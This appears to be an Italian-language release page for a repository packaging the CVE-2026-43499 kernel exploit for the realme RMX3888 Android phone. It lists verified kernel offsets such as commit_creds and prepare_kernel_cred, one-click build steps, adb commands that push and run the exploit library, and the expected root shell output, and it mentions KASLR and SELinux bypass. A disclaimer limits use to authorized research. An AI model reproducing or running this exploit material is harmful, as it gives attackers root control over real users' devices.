Torna agli aggiornamenti
New releaseJul 31, 2026

rmx3888-cve-2026-43499-config v0.2.0

CVE-2026-43499 configurazione dell'exploit per realme RMX3888 (Android 16) - 20 offset del kernel verificati

Condividi

Configurazione dell'Exploit CVE-2026-43499 per realme RMX3888

Informazioni sul Dispositivo

  • Marca/Modello: realme RMX3888
  • Versione Android: 16 (SDK 36)
  • Build ID: BP2A.250605.015
  • Kernel: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • Architettura: ARM64 (aarch64)

Panoramica

Questo repository contiene i file di configurazione completi per l'exploit CVE-2026-43499 (GhostLock) che ha come target il dispositivo realme RMX3888. Tutti gli offset del kernel sono stati estratti e verificati dal boot.img del dispositivo.

Funzionalità

20 offset del kernel verificati estratti da vmlinux
Logging in tempo reale con O_SYNC + fsync per la sicurezza in caso di kernel panic
Configurazione specifica per il dispositivo RMX3888
Script di compilazione con un clic con rilevamento automatico dell'NDK
Documentazione completa con guide alla compilazione

File Inclusi

File di Configurazione

  • arget.h - Offset del kernel specifici per il dispositivo (20 offset verificati)
  • common.h - Configurazione di compilazione con integrazione del logging

ealtime_log.h - Implementazione del logging in tempo reale

Documentazione

  • BUILD_GUIDE.md - Guida completa alla compilazione

eport.md - Rapporto di analisi dettagliato (Round 1)

ound2_report.md - Rapporto di configurazione (Round 2)

  • ROUND2_STATUS.md - Riepilogo dello stato di esecuzione
  • compile_status.json - Stato di compilazione leggibile da macchina

Script

  • compile_rmx3888.sh - Script di compilazione con un clic

Avvio Rapido

Prerequisiti

  • Android NDK r26d o successivo
  • Ambiente Git Bash, Linux/WSL o Termux

Compilazione

git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

Su Windows Git Bash, lo script rileva automaticamente il percorso SDK predefinito utilizzato da Android Studio e dagli strumenti da riga di comando: /c/Android/Sdk/ndk/*.

Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ utilizzano attualmente fallback compatibili con la compilazione nell'header del target RMX3888. Sostituiscili con gli offset vmlinux RMX3888 verificati prima di fare affidamento sul comportamento a runtime.

Utilizzo

# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

Offset Principali

Gli offset principali riportati di seguito sono stati estratti dal kernel 6.1.141. Consulta la nota precedente per le voci di fallback compatibili con la compilazione che richiedono ancora una verifica specifica per RMX3888.

#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

Funzionalità di Logging

Il modulo di logging in tempo reale integrato fornisce:

  • Percorso di log primario: /sdcard/Download/log_.txt
  • Percorso di fallback: /data/local/tmp/log_.txt
  • Sicuro contro il kernel panic: utilizza O_SYNC + fsync() per la scrittura immediata su disco
  • Voci con timestamp: tutte le voci di log includono timestamp precisi
  • Mirror su stderr: i log vengono inoltre emessi su stderr per adb logcat

Risultati Attesi

Sfruttamento Riuscito

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

Output del File di Log

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

Risoluzione dei Problemi

Consulta BUILD_GUIDE.md per istruzioni dettagliate sulla risoluzione dei problemi, tra cui:

  • Errori di compilazione
  • Crash a runtime
  • Problemi di bypass di KASLR
  • Blocchi delle policy SELinux

Avviso di Sicurezza

⚠️ AVVERTENZA: questa configurazione è destinata esclusivamente alla ricerca sulla sicurezza autorizzata.

  • Utilizza solo su dispositivi di tua proprietà
  • Non distribuire binari compilati senza autorizzazione
  • Rispetta le pratiche di divulgazione responsabile
  • I file di log possono contenere informazioni di sistema sensibili

Dettagli Tecnici

Processo di Estrazione

  1. Boot.img decompresso tramite il parser Android Boot Image v4
  2. vmlinux estratto tramite vmlinux-to-elf (102.871 simboli)
  3. 99.580 simboli validi analizzati ed esaminati
  4. 20 offset critici convalidati in modo incrociato
  5. Verifica degli offset tramite controlli di coerenza degli indirizzi dei simboli

Verifica degli Offset

  • Indirizzo base del kernel confermato: 0xffffffc008000000
  • Tutti gli indirizzi dei simboli validati rispetto al layout di memoria
  • Riferimenti incrociati con il dispositivo di riferimento (Google Pixel tokay)
  • Tasso di successo di estrazione del 100% (20/20 offset)

Riferimenti

Licenza

Questa configurazione è fornita esclusivamente per scopi educativi e di ricerca sulla sicurezza.

Esclusione di Responsabilità

Questo repository contiene materiali di ricerca sulla sicurezza. Gli autori e i contributori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Utilizzalo a tuo rischio e pericolo e solo su dispositivi di tua proprietà o per i quali disponi di esplicita autorizzazione al test.


Generato: 2026-07-23
Versione del Kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verifica degli Offset: 100% (20/20)
Stato: Pronto per la compilazione

Categorie